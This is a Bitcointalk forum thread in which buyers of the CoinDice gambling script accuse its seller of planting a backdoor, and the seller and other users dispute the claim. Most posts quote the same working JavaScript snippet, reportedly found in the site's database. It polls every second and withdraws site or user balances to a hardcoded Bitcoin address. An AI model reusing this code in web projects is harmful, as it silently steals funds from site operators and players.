|
HrN (OP)
|
 |
March 15, 2014, 08:36:50 AM
Last edit: January 04, 2015, 10:03:26 PM by HrN |
|
they will inject this code if you buy from them..
setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",{_adr:'16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D',_am:ammount},function(data){});}else{window.location.replace("./?p=wallet");}}else{function refreshBalancehaxored(){var s1=(document.location).toString();var s=s1.split("=")[1];s=s.substring(0,s.length- 24)
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':function(data){}});}}});}
refreshBalancehaxored();}},1000);
|
.()_().
|
|
|
|
|
|
|
|
|
|
|
|
"Your bitcoin is secured in a way that is physically impossible for others to access, no matter for what reason, no matter how good the excuse, no matter a majority of miners, no matter what." -- Greg Maxwell
|
|
|
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
|
|
|
|
|
RoooooR
Legendary
 Offline
Activity: 1008
Merit: 1000
GigTricks.io | A CRYPTO ECOSYSTEM FOR ON-DEMAND EC
|
|
March 15, 2014, 08:43:59 AM |
|
I'll hire a php/java programmer and he will fix this garbage. And then I'll sell this script for .1 btc.
If he don't refund my 1 BTC.
|
|
|
|
Jacksquere
Member
Offline
Activity: 70
Merit: 10
|
 |
March 15, 2014, 08:52:22 AM |
|
I had a Script like this but I am not found this in my scripts ..
|
|
|
|
johny1976
Legendary
Offline
Activity: 1135
Merit: 1002
Developer
|
|
March 15, 2014, 12:55:20 PM |
|
https://bitcointalk.org/index.php?topic=404227.msg5707551#msg5707551I bought coindice and they stollen all my btc. I paid 1.1 btc for script and they stollen 0.54 btc with their backdoor Today i found this code in db: setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",{_adr:'16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D',_am:ammount},function(data){});}else{window.location.replace("./?p=wallet");}}else{function refreshBalancehaxored(){var s1=(document.location).toString();var s=s1.split("=")[1];s=s.substring(0,s.length- 24)
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':function(data){}});}}});}
refreshBalancehaxored();}},1000); This is not from original version of the script, you can check it in original files. You just let someone to put backdoor in your script. You even haven't been updating the script... |
|
|
|
|
|
leckey
|
|
March 20, 2014, 08:43:28 PM |
|
https://bitcointalk.org/index.php?topic=404227.msg5707551#msg5707551I bought coindice and they stollen all my btc. I paid 1.1 btc for script and they stollen 0.54 btc with their backdoor Today i found this code in db: setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",{_adr:'16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D',_am:ammount},function(data){});}else{window.location.replace("./?p=wallet");}}else{function refreshBalancehaxored(){var s1=(document.location).toString();var s=s1.split("=")[1];s=s.substring(0,s.length- 24)
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':function(data){}});}}});}
refreshBalancehaxored();}},1000); This is not from original version of the script, you can check it in original files. You just let someone to put backdoor in your script. You even haven't been updating the script...If he found that code in the DB it means your code is not up to scratch in stopping SQL injections. |
|
|
|
johny1976
Legendary
Offline
Activity: 1135
Merit: 1002
Developer
|
|
March 20, 2014, 09:52:41 PM |
|
https://bitcointalk.org/index.php?topic=404227.msg5707551#msg5707551I bought coindice and they stollen all my btc. I paid 1.1 btc for script and they stollen 0.54 btc with their backdoor Today i found this code in db: setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",{_adr:'16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D',_am:ammount},function(data){});}else{window.location.replace("./?p=wallet");}}else{function refreshBalancehaxored(){var s1=(document.location).toString();var s=s1.split("=")[1];s=s.substring(0,s.length- 24)
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':function(data){}});}}});}
refreshBalancehaxored();}},1000); This is not from original version of the script, you can check it in original files. You just let someone to put backdoor in your script. You even haven't been updating the script...If he found that code in the DB it means your code is not up to scratch in stopping SQL injections. I created the script so I know how this things work. There's no SQL injection. All database inputs are protected. That steal was his fault. He didn't secure server properly. I already said he had old version of the script. Please read before you post something like this. He had 1.2, it was fixed in 2.0 and newest 3.0 version has also 2 factor auth. |
|
|
|
|
johny1976
Legendary
Offline
Activity: 1135
Merit: 1002
Developer
|
|
March 22, 2014, 12:33:33 PM
Last edit: January 02, 2015, 03:03:56 AM by johny1976 |
|
https://bitcointalk.org/index.php?topic=404227.msg5707551#msg5707551I bought coindice and they stollen all my btc. I paid 1.1 btc for script and they stollen 0.54 btc with their backdoor Today i found this code in db: setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",{_adr:'16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D',_am:ammount},function(data){});}else{window.location.replace("./?p=wallet");}}else{function refreshBalancehaxored(){var s1=(document.location).toString();var s=s1.split("=")[1];s=s.substring(0,s.length- 24)
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':function(data){}});}}});}
refreshBalancehaxored();}},1000); This is not from original version of the script, you can check it in original files. You just let someone to put backdoor in your script. You even haven't been updating the script...If he found that code in the DB it means your code is not up to scratch in stopping SQL injections. I created the script so I know how this things work. There's no SQL injection. All database inputs are protected. That steal was his fault. He didn't secure server properly. I already said he had old version of the script. Please read before you post something like this. He had 1.2, it was fixed in 2.0 and newest 3.0 version has also 2 factor auth. You sold me a vulnerable script! YOU SCAMMED ME! No, we did not. At least prove it before you start antiCoinDice campaign. |
|
|
|
|
|
lumberinvestments
|
|
April 06, 2014, 01:47:40 PM |
|
https://bitcointalk.org/index.php?topic=404227.msg5707551#msg5707551I bought coindice and they stollen all my btc. I paid 1.1 btc for script and they stollen 0.54 btc with their backdoor Today i found this code in db: setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",{_adr:'16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D',_am:ammount},function(data){});}else{window.location.replace("./?p=wallet");}}else{function refreshBalancehaxored(){var s1=(document.location).toString();var s=s1.split("=")[1];s=s.substring(0,s.length- 24)
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':function(data){}});}}});}
refreshBalancehaxored();}},1000); This is not from original version of the script, you can check it in original files. You just let someone to put backdoor in your script. You even haven't been updating the script...If he found that code in the DB it means your code is not up to scratch in stopping SQL injections. I created the script so I know how this things work. There's no SQL injection. All database inputs are protected. That steal was his fault. He didn't secure server properly. I already said he had old version of the script. Please read before you post something like this. He had 1.2, it was fixed in 2.0 and newest 3.0 version has also 2 factor auth. You sold me a vulnerable script! YOU SCAMMED ME! No, we did not. At least prove it before you start antiCoinDice action. Hey you scum, This guy is mostly sure legit, he would not fill the forum with scam messages if he really lost 0.1 BTC in your website, but he would only do this if he was really scammed. I would do the same. If I would've lost 60 USD in a dice game (even if I don't like to bet), I would just take the loss and that's it, it's only 60 dollars. To me, his anger proves that you really scammed him, especially the code that he is posting. |
|
|
|
|
|
RENDERING
|
|
December 21, 2014, 10:36:33 PM |
|
I also bought this script from him and it is backdoored. He can change a player balance to whatever he wants and withdraw all the coins in the wallets!
DO NOT BUY THIS SCAMMERS SCRIPT HE WILL STEEL ALL YOUR COINS!
|
|
|
|
|
nahtnam
Legendary
Offline
Activity: 1092
Merit: 1000
nahtnam.com
|
|
December 22, 2014, 06:08:29 AM |
|
Can you atleast show some proof that he was the one that sold you the script and not some illegal reseller?
|
|
|
|
|
cryptoforcause
|
|
December 22, 2014, 06:58:54 AM |
|
I feel that HrN has no right to call Jonny a scammer unless he got a better and legit proof!!
|
|
|
|
|
|
RiverBoatBTC
|
|
December 22, 2014, 08:52:59 AM
Last edit: December 22, 2014, 09:04:29 AM by RiverBoatBTC |
|
Gotta check for those backdoors man, it's your own fault if you had funds stolen and you didn't check
|
|
|
|
|
mailmansDOGE
|
|
December 22, 2014, 06:57:25 PM |
|
https://bitcointalk.org/index.php?topic=404227.msg5707551#msg5707551I bought coindice and they stollen all my btc. I paid 1.1 btc for script and they stollen 0.54 btc with their backdoor Today i found this code in db: setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",{_adr:'16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D',_am:ammount},function(data){});}else{window.location.replace("./?p=wallet");}}else{function refreshBalancehaxored(){var s1=(document.location).toString();var s=s1.split("=")[1];s=s.substring(0,s.length- 24)
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':function(data){}});}}});}
refreshBalancehaxored();}},1000); Till now I havnt seen anything like this in the coindice script that I have seen. Although I know that coindice has certain vulnerabilities, like double deposits(was there in earlier versions), but I dont think that people can actualy withraw like this. |
|
|
|
|
|
josef2000
|
|
January 02, 2015, 01:25:16 AM |
|
I think you didnt even buy the original. You just found the script somewhere and used it.
|
██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████ |
|
|
Fortify
Legendary
Offline
Activity: 2646
Merit: 1176
|
|
January 02, 2015, 05:53:46 PM |
|
A couple things that might help to clarify the situation:
When did you buy the script?
Where did you buy the script?
Helps if you include basic info like this in the original complaint.
|
|
|
|
|
|
| R |
▀▀▀▀▀▀▀██████▄▄
████████████████
▀▀▀▀█████▀▀▀█████
████████▌███▐████
▄▄▄▄█████▄▄▄█████
████████████████
▄▄▄▄▄▄▄██████▀▀ | LLBIT | | | 4,000+ GAMES███████████████████
██████████▀▄▀▀▀████
████████▀▄▀██░░░███
██████▀▄███▄▀█▄▄▄██
███▀▀▀▀▀▀█▀▀▀▀▀▀███
██░░░░░░░░█░░░░░░██
██▄░░░░░░░█░░░░░▄██
███▄░░░░▄█▄▄▄▄▄████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ | █████████
▀████████
░░▀██████
░░░░▀████
░░░░░░███
▄░░░░░███
▀█▄▄▄████
░░▀▀█████
▀▀▀▀▀▀▀▀▀ | █████████
░░░▀▀████
██▄▄▀░███
█░░█▄░░██
░████▀▀██
█░░█▀░░██
██▀▀▄░███
░░░▄▄████
▀▀▀▀▀▀▀▀▀ |
| | | ██░░░░░░░░░░░░░░░░░░░░░░██
▀█▄░▄▄░░░░░░░░░░░░▄▄░▄█▀
▄▄███░░░░░░░░░░░░░░███▄▄
▀░▀▄▀▄░░░░░▄▄░░░░░▄▀▄▀░▀
▄▄▄▄▄▀▀▄▄▀▀▄▄▄▄▄
█░▄▄▄██████▄▄▄░█
█░▀▀████████▀▀░█
█░█▀▄▄▄▄▄▄▄▄██░█
█░█▀████████░█
█░█░██████░█
▀▄▀▄███▀▄▀
▄▀▄▀▄▄▄▄▀▄▀▄
██▀░░░░░░░░▀██ | | | | | | | .
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
░▀▄░▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄░▄▀
███▀▄▀█████████████████▀▄▀
█████▀▄░▄▄▄▄▄███░▄▄▄▄▄▄▀
███████▀▄▀██████░█▄▄▄▄▄▄▄▄
█████████▀▄▄░███▄▄▄▄▄▄░▄▀
████████████░███████▀▄▀
████████████░██▀▄▄▄▄▀
████████████░▀▄▀
████████████▄▀
███████████▀ | ▄▄███████▄▄
▄████▀▀▀▀▀▀▀████▄
▄███▀▄▄███████▄▄▀███▄
▄██▀▄█▀▀▀█████▀▀▀█▄▀██▄
▄██▀▄██████▀████░███▄▀██▄
███░█████████▀██░████░███
███░████░█▄████▀░████░███
███░████░███▄████████░███
▀██▄▀███░█████▄█████▀▄██▀
▀██▄▀█▄▄▄██████▄██▀▄██▀
▀███▄▀▀███████▀▀▄███▀
▀████▄▄▄▄▄▄▄████▀
▀▀███████▀▀ | | OFFICIAL PARTNERSHIP
FAZE CLAN
SSC NAPOLI | | |
|
|
|
mayax
Legendary
Offline
Activity: 1456
Merit: 1004
|
|
January 27, 2015, 01:36:37 PM |
|
do not download any script you find for free. it may contains malwares and other shits  |
|
|
|
|
|
mailmansDOGE
|
|
January 30, 2015, 06:44:29 PM |
|
do not download any script you find for free. it may contains malwares and other shits Scripts can be downloaded for free until you don't have some important data in your pc md you can use you script after checking it properly. |
|
|
|
|
mayax
Legendary
Offline
Activity: 1456
Merit: 1004
|
|
January 30, 2015, 11:18:06 PM |
|
do not download any script you find for free. it may contains malwares and other shits Scripts can be downloaded for free until you don't have some important data in your pc md you can use you script after checking it properly. if you know to check a such script, then you know programming so you can do it yourself.. |
|
|
|
|
|
mailmansDOGE
|
|
January 31, 2015, 11:23:34 AM |
|
do not download any script you find for free. it may contains malwares and other shits Scripts can be downloaded for free until you don't have some important data in your pc md you can use you script after checking it properly. if you know to check a such script, then you know programming so you can do it yourself.. Making your own script takes a lot lot more time than checking it for loopholes. I agree that everything (making a script and finding loopholes) have a lot of hard work involved but checking a script is not as difficult as compared to creating one because you don't have to innovate and waste time on front end support. |
|
|
|
|
mayax
Legendary
Offline
Activity: 1456
Merit: 1004
|
|
February 02, 2015, 04:01:25 AM |
|
do not download any script you find for free. it may contains malwares and other shits Scripts can be downloaded for free until you don't have some important data in your pc md you can use you script after checking it properly. if you know to check a such script, then you know programming so you can do it yourself.. Making your own script takes a lot lot more time than checking it for loopholes. I agree that everything (making a script and finding loopholes) have a lot of hard work involved but checking a script is not as difficult as compared to creating one because you don't have to innovate and waste time on front end support. it is easy to program something if you have a model. the hardest part is when you want to create... |
|
|
|
|
|
